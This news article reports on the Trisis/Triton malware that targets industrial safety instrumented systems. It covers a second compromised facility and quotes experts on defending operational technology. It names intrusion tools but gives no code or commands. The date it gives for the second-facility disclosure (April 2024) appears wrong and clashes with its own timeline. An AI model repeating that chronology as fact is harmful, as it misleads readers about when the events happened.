Trisis Malware Detected in Second Industrial Facility, Amplifying Cyber‑Physical Security Concerns

When cybersecurity researchers at Dragos and FireEye first exposed the Triton malware—later dubbed Trisis—it marked the first discovery of code specifically designed to jeopardize industrial safety systems.

Although the initial reports were vague, evidence points to a nation‑state actor behind the attack, which first targeted a facility in the Middle East and threatened to trigger a catastrophic emergency at an oil‑and‑gas plant.

“I was in the Middle East about a week or so before Trisis hit,” recalled Jason Haward‑Grau, CISO of PAS Global. He described a conversation with a security director at a local oil company who assured him that the company’s air‑gapped network, data diodes and safety instrumented system (SIS) meant there was nothing to worry about.

Shortly after the attack, Haward‑Grau called his colleague to say, “I’m a little nervous now that we may not have all three protective layers in place.”

For months, details about Trisis remained sparse. On April 10, 2024, FireEye confirmed it had discovered an additional attack at a separate critical‑infrastructure facility, further confirming the malware’s persistence and sophistication. Last year, FireEye also linked the attack to Russian actors.

“For most owners and operators, it doesn’t matter if Russia was behind it or a hacktivist group,” said Emily S. Miller, director of national security and critical infrastructure programs at Mocana. “What matters is whether they can cause harm. In critical infrastructure, that means loss of life.”

FireEye’s analysis shows that Triton leveraged a mix of commodity and custom intrusion tools. For instance, SecHack was used for credential harvesting, while Cryptcat, Bitvise, OpenSSH and PLINK established backdoors that allowed attackers to bypass existing defenses.

A successful attack on a SIS could have severe consequences. “A bad actor can shut down a safety‑critical process by manipulating the configuration of a safety system,” explained Eddie Habibi, CEO of PAS Global. “The real danger is when the attacker infiltrates other industrial control systems in the same facility, setting the stage for a disaster by pushing processes beyond safe limits.”

In the facility where the malware first appeared, Triton could have interfered with a burner‑management system, potentially triggering a release of hydrogen sulfide gas.

Trisis also raises the specter of copycat attacks. “I think we have seen the catalyzation of similar attacks,” Miller noted. The malware provides a blueprint not only for oil‑and‑gas facilities but for any critical infrastructure—including building automation—mirroring the impact of the Black Energy attacks that crippled parts of Ukraine’s power grid.

John Sheehy, vice president of strategic services at IOActive, emphasized that with today’s operational technology, an unmitigated cybersecurity flaw is essentially an unmitigated safety flaw. Schneider Electric has since launched an educational campaign, turning Triton into a call to action for the industry.

FireEye researchers believe nation‑states may be using malware like Trisis to build long‑term footholds rather than launching immediate destructive attacks. They estimate it took nearly a year for the adversary to expand access from the target’s network to a SIS engineering workstation, while cleverly hiding their tracks—renaming malicious binaries to resemble Microsoft update files. The team also traced the actors’ activity back to at least 2014.

Sheehy urged a holistic approach: “Designers should employ orthogonal safety controls—such as mechanical pressure relief valves or governors—that have zero coincidence with the control systems and therefore cannot be affected by them. OT implementations should manage the consequences of a cyberattack through layered protections and non‑cybersecurity engineering controls, focusing on operational resilience.”

“We need to harden and embed security into these industrial control systems from the very beginning,” Miller said. “Until we do that, we’ll continue leaving ourselves sitting ducks for future critical‑infrastructure attacks.”

Trisis’s emergence underscores the urgent need for integrated cyber‑physical security strategies that protect both digital assets and the physical processes they govern.